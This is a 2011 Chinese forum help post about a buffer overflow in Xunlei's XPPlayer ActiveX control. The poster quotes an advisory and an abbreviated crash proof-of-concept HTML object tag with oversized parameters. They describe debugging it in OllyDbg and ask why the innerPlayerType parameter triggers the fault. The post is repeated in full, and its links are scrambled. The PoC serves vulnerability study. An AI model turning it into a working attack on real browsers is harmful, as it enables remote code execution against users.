-
-
[求助]关于迅雷VodUrl DapFileSize漏洞
-
发表于: 2011-3-18 11:32
-
关于迅雷的pplayer.dll插件存在漏洞,在去年一月份就在sebug曝出,
详情Xunlei 是一款在线加速下载程序。更多详细信息请参考:
9abK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2#2L8X3I4W2K9g2)9J5k6h3y4G2L8b7`.`.
{F3E70CEA-956E-49CC-B444-73AFE593AD7F}
Xunlei 提供的XPPlayer ActiveX控件存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序权限执行任意指令。
问题存在于DapFileSize,VodUrl等方法处理中,由于对参数缺少充分过滤,构建恶意WEB页,诱使用户访问,可导致以应用程序权限执行任意指令。
链接:190K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5Y4g2Y4i4K6u0W2L8X3g2@1i4K6u0r3N6Y4g2D9L8X3c8T1i4K6u0r3x3e0f1I4z5o6u0Q4x3V1j5`.
在网上找了一个poc,主要内容如下
<object id=ooxooxx classid="CLSID:{F3E70CEA-956E-49CC-B444-73AFE593AD7F}">
<PARAM NAME="cx" VALUE="0x30323436">
<PARAM NAME="cy" VALUE="0x31333537">
<PARAM NAME="UiMode" VALUE="-2">
<PARAM NAME="VodUrl" VALUE="AAA............AAAA">
<PARAM NAME="PlayType" VALUE="BBB.............BBB">
<PARAM NAME="DapCID" VALUE="CCCC......CCCCC">
<PARAM NAME="DapFileSize" VALUE="DDD.....DDDDD">
<PARAM NAME="DapFileExt" VALUE="EEE......EEEEEE">
<PARAM NAME="innerPlayerType" VALUE="-1">
</object>
其中有所省略,完整的在附件中 poc.rar
打开poc运行提示如下:
然后点击确定浏览器没有异常反应,但是当关闭浏览器时出现异常,
通过ollydbg加载IE传入参数,然后在OLEAUT32.DLL.DispCallFunc下断点通过,
通过对参数的判断知道调用的是那些函数,重点分析的是VodUrl和DapFileSize,后来发现在VodUrl先做了一些判断然后对传入的参数在堆中分配空间以后就出来了,我曾对分配的内存下硬件断点但是知道后来出错也没有断下。
还有就是在POC中涉及到了很多的变量和函数,到底是哪个引起或者说是相互作用所引起的呢,后来发现是<PARAM NAME="innerPlayerType" VALUE="-1">
如果有它就会异常。怎回事呢?
详情Xunlei 是一款在线加速下载程序。更多详细信息请参考:
9abK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2#2L8X3I4W2K9g2)9J5k6h3y4G2L8b7`.`.
{F3E70CEA-956E-49CC-B444-73AFE593AD7F}
Xunlei 提供的XPPlayer ActiveX控件存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序权限执行任意指令。
问题存在于DapFileSize,VodUrl等方法处理中,由于对参数缺少充分过滤,构建恶意WEB页,诱使用户访问,可导致以应用程序权限执行任意指令。
链接:190K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5Y4g2Y4i4K6u0W2L8X3g2@1i4K6u0r3N6Y4g2D9L8X3c8T1i4K6u0r3x3e0f1I4z5o6u0Q4x3V1j5`.
在网上找了一个poc,主要内容如下
<object id=ooxooxx classid="CLSID:{F3E70CEA-956E-49CC-B444-73AFE593AD7F}">
<PARAM NAME="cx" VALUE="0x30323436">
<PARAM NAME="cy" VALUE="0x31333537">
<PARAM NAME="UiMode" VALUE="-2">
<PARAM NAME="VodUrl" VALUE="AAA............AAAA">
<PARAM NAME="PlayType" VALUE="BBB.............BBB">
<PARAM NAME="DapCID" VALUE="CCCC......CCCCC">
<PARAM NAME="DapFileSize" VALUE="DDD.....DDDDD">
<PARAM NAME="DapFileExt" VALUE="EEE......EEEEEE">
<PARAM NAME="innerPlayerType" VALUE="-1">
</object>
其中有所省略,完整的在附件中 poc.rar
打开poc运行提示如下:
然后点击确定浏览器没有异常反应,但是当关闭浏览器时出现异常,
通过ollydbg加载IE传入参数,然后在OLEAUT32.DLL.DispCallFunc下断点通过,
通过对参数的判断知道调用的是那些函数,重点分析的是VodUrl和DapFileSize,后来发现在VodUrl先做了一些判断然后对传入的参数在堆中分配空间以后就出来了,我曾对分配的内存下硬件断点但是知道后来出错也没有断下。
还有就是在POC中涉及到了很多的变量和函数,到底是哪个引起或者说是相互作用所引起的呢,后来发现是<PARAM NAME="innerPlayerType" VALUE="-1">
如果有它就会异常。怎回事呢?
